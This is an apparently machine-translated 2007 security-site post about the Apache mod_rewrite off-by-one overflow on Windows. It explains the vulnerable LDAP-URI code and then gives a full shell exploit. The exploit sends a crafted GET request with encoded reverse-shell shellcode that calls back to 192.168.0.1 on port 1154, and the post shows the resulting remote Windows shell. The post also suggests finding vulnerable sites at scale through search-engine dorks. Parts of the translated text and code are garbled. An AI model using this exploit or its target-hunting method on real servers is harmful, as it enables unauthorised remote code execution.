Vuln Review: Apache Mod_Rewrite Off-by-one Remote Exploit(Win32)-vulnerability warning-the black bar safety net

2007-04-11T00:00:00
ID MYHACK58:62200714977
Type myhack58
Reporter 佚名
Modified 2007-04-11T00:00:00

Description

by axis Date: 2007-04-07 http://www.ph4nt0m.org

Last time in irc in the demo another loophole to get the cmd banner, the result is the swan large cattle mistakenly think that this is the vulnerability, then the recent use of leisure time, with a bit of this vulnerability. This vulnerability on windows seems to be very General, and directly went to run my shellcode is a shellcode is somewhat limited.

However, the vulnerability for Server conditions some restrictions

  • The RewriteRule allows the attacker to control the initial part of the rewritten URL (for example if the substitution URL starts with $1)
  • The RewriteRule flags do NOT include any of the following flags: Forbidden (F), Gone (G), or NoEscape (NE).

Specific reference

<http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html>

At the same time the vulnerability is also affected by the compiler of the impact, because it is off by one. For some compilers, habitual in ebp back fill in some bytes, in order to achieve alignment, such as gcc, so the redhat default is not affected.

But the vulnerability in win on can be utilized. And from my effect of view, as if still very generic.

To determine whether the presence of vulnerabilities can be some method, such as the submission payload to the past, the webserver returns 3 0 2, then there does not exist the vulnerability. If the person returns the 4 0 0, then it is probably because the rewrite rules do not meet the conditions, so can not trigger the vulnerability.

shellcode some badchar, the need to filter out for example? /And other special characters, I here directly with a comparison of BT to the shellcode, but also alpha2 encoded, saves trouble. Everyone can go to the metasploit-generated.

the payload in front of those fill characters, such as Ph4nt0m, etc., as if with the vulnerability itself is irrelevant, the number is also arbitrary, in particular not carefully followed.

The problem code is:

2 6 9 6 / escape absolute uri, which may or may not be path oriented. 2 6 9 7 * So let's handle them differently. 2 6 9 8 / 2 6 9 9 static char escape_absolute_uri(ap_pool p, char uri, unsigned scheme) 2 7 0 0 { 2 7 0 1 char cp; 2 7 0 2 ... ... 2 7 2 7 / special thing for ldap. 2 7 2 8 * The parts are separated by question marks. From RFC 2 2 5 5: 2 7 2 9 * ldapurl = scheme "://" [hostport] ["/" 2 7 3 0 * [dn ["?" [attributes] ["?" [scope] 2 7 3 1 * ["?" [filter] ["?" extensions]]]]]] 2 7 3 2 / 2 7 3 3 if (! strncasecmp(uri, "ldap", 4)) { 2 7 3 4 char token[5]; 2 7 3 5 int c = 0; 2 7 3 6 2 7 3 7 token[0] = cp = ap_pstrdup(p, cp); 2 7 3 8 while (cp && c < 5) { 2 7 3 9 if (cp == '?') { 2 7 4 0 token[++c] = cp + 1; 2 7 4 1 cp = '\0'; 2 7 4 2 } 2 7 4 3 ++cp; 2 7 4 4 }

In the case that an LDAP URI that contains a fifth '?' the line 2 7 4 0 causes an off-by-one overflow, it's writing in token[5].

Specific reference <http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded>

You can use google hacking to find vulnerabilities of the station, because the used to mod_rewrite, are generally large stations, such as the php disguised as htm or html, then definitely use mod_rewrite,then you can directly google keyword allinurl:". htm? id=" Because of the use of dynamic invocation of the htm, is certainly disguised, a similar method to find. Then you can write an automated script to determine these sites which is apache (Win32), this in the http header will display.

Or we have other better methods?

Finally, attach my Trojan, please according to my notes written in the httpd. conf modifications.

!/ bin/sh

Exploit for Apache mod_rewrite off-by-one(Win32).

by axis < axis@ph4nt0m>

http://www.ph4nt0m.org

2007-04-06

Tested on Apache 2.0.58 (Win32)

Windows2003 CN SP1

Vulnerable Apache Versions:

* 1.3 branch: >1.3.28 and < 1.3.37

* 2.0 branch: >2.0.46 and < 2.0.59

* 2.2 branch: >2.2.0 & <2.2.3

Vulnerability discovered by Mark Dowd.

CVE-2 0 0 6-3 7 4 7

first POC by jack < jack\x40gulcas\x2Eorg>

2006-08-20

http://www.milw0rm.com/exploits/2237

to successfully exploit the vuln,there are some conditions

http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html

some compilers added padding to the stack, so they could not be exploited,like gcc under redhat

for more details about the vuln please see:

http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded

no opcodes needed under windows!

it will directly run our shellcode

my apache config file

[httpd. conf]:

RewriteEngine on

RewriteRule 1/(.*) $1

RewriteLog "logs/rewrite. log"

RewriteLogLevel 3

Usage:

[axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141

mod_rewrite apache off-by-one overflow

[axis@opensystemX axis]$ nc-vv-n-l-p 1 1 5 4

listening on [any] 1 1 5 4 ...

connect to [x. x. x. 1 1 1] from (UNKNOWN) [10.0.76.141] 4 0 7 7

Microsoft Windows [°?±? 5.2.3790]

(C) °? è? ùóD 1985-2003 Microsoft Corp.

D:\Apache\Apache2>exit

exit

sent 5, rcvd 1 0 0

shellcode badchar, I used here, actually does not need so much

I talked to two badchar is 0x3f and 0x0b other is to generate shellcode habitual retention of

0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b

echo-e "mod_rewrite apache off-by-one overflow"

if [ $# -ne 1 ] ; then echo "Usage: $0 webserver" exit fi

host=$1

use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string

echo-ne "GET /1/ldap://ph4nt0m/`perl-e 'print "Ph4nt0m"x5"\

%3f to trigger the vuln

%3fA%3fA%3f\

string "CCCC.." is any arbitrary string, use %3f to trigger the vuln

%9 0 is the machine code we will jmp to(NOP),run shellcode from here

`perl-e 'print "C"x10"%3fC%3f%9 0\

shellcode,reverse shell to 192.168.0.1 ,port 1 1 5 4 alpha2 encoded

`perl-e 'print "\ \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\ \x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63\ \x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x42\x32\x42\x41\x41\x32\ \x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\69\x79\x79\x6c\x51\ \x7a\x6a\x4b\x50\x4d\x4d\x38\x6b\x49\x79\x6f\x49\x6f\x6b\x4f\x65\ \x30\x4c\x4b\x72\x4c\x45\x74\x51\x34\x4e\x6b\x71\x55\x77\x4c\x6c\ \x4b\x33\x4c\x64\x45\x33\x48\x64\x41\x5a\x4f\x4c\x4b\x72\x6f\x36\ \x78\x4c\x4b\x73\x6f\x45\x70\x66\x61\x4a\x4b\x53\x79\x4e\x6b\x44\ \x74\x4e\x6b\x73\x31\x38\x6e\x55\x61\x79\x50\x6c\x59\x6c\x6c\x4b\ \x34\x6f\x30\x74\x34\x34\x47\x59\x51\x5a\x6a\x 76\x6d\x 76\x61\x6f\ \x32\x5a\x4b\x79\x64\x55\x6b\x33\x64\x51\x34\x41\x38\x30\x75\x4b\ \x55\x6e\x6b\x33\x6f\x44\x64\x46\x61\x7a\x4b\x32\x46\x6e\x6b\x34\ \x4c\x42\x6b\x6e\x6b\x73\x6f\x77\x6c\x54\x41\x58\x6b\x43\x33\x74\ \x6c\x6c\x4b\x4d\x59\x50\x6c\x74\x64\x75\x4c\x52\x41\x6f\x33\x50\ \x31\x6b\x6b\x72\x44\x4c\x4b\x50\x43\x66\x50\x6c\x4b\x33\x70\x64\ \x4c\x6c\x4b\x74\x30\x65\x4c\x4e\x4d\x4e\x6b\x53\x70\x47\x78\x33\ \x6e\x51\x78\x4c\x4e\x52\x6e\x56\x6e\x58\x6c\x50\x50\x59\x6f\x79\ \x46\x70\x66\x62\x73\x75\x36\x75\x38\x66\x53\x64\x72\x42\x48\x53\ \x47\x32\x53\x50\x32\x71\x4f\x71\x44\x49\x6f\x48\x50\x52\x48\x5a\ \x6b\x48\x6d\x6b\x4c\x65\x6b\x70\x50\x4b\x4f\x68\x56\x61\x4f\x4e\ \69\x4a\x45\x30\x66\x6e\x61\x78\x6d\x67\x78\x73\x32\x42\x75\x52\ \x4a\x75\x52\x6b\x4f\x7a\x70\x61\x78\x6b\69\x55\x59\x6c\x35\x6e\ \x4d\x51\x47\x4b\x4f\x4e\x36\x70\x53\x50\x53\x56\x33\x 76\x33\x43\ \x73\x32\x73\x31\x53\x52\x73\x6b\x4f\x4a\x70\x70\x68\x6f\x30\x6d\ \x78\x35\x50\x46\x61\x30\x66\x30\x68\x 76\x64\x6c\x42\x33\x56\x70\ \x53\x4e\69\x78\x61\x4c\x55\x75\x38\x4a\x4c\x58\x79\x4c\x6a\x73\ \x50\x53\x67\x6b\x4f\x6a\x 76\x73\x5a\x72\x30\x73\x61\x53\x65\x4b\ \x4f\x6a\x70\x52\x46\x31\x7a\x52\x44\x73\x56\x50\x68\x51\x73\x50\ \x6d\x32\x4a\x62\x70\x51\x49\x47\x59\x6a\x6c\x6c\x49\x4b\x57\x42\ \x4a\x73\x74\x6d\x59\x6d\x32\x35\x61\x6f\x30\x48\x73\x4f\x5a\x6f\ \x65\x4c\x49\x39\x6d\x4b\x4e\x33\x72\x54\x6d\x6b\x4e\x33\x72\x34\ \x6c\x6c\x4d\x50\x7a\x57\x48\x4e\x4b\x4c\x6b\x6c\x6b\x71\x78\x32\ \x52\x6b\x4e\x6c\x73\x42\x36\x49\x6f\x73\x45\x65\x78\x6b\x4f\x6e\ \x36\x71\x4b\x42\x77\x43\x62\x53\x61\x 76\x31\x70\x51\x30\x6a\x35\ \x51\x62\x71\x 76\x31\x72\x75\x43\x61\x4b\x4f\x6e\x30\x73\x58\x4e\ \x4d\x7a\x79\x37\x75\x38\x4e\x31\x43\x4b\x4f\x4a\x 76\x30\x6a\x39\ \x6f\x6b\x4f\x70\x37\x6b\x4f\x6e\x30\x45\x38\x39\x77\x54\x39\x79\ \x56\x71\69\x79\x6f\x53\x45\x56\x64\69\x6f\69\x46\x6b\x4f\x62\ \x57\x6b\x4c\x4b\x4f\x6a\x70\x50\x68\x6a\x50\x6f\x7a\x37\x74\x43\ \x6f\x72\x73\x4b\x4f\x6a\x 76\x79\x6f\x38\x50\x63\ ""\ HTTP/1.0\r\n\ Host: $host\r\n\r\n" | nc-vv $host 8 0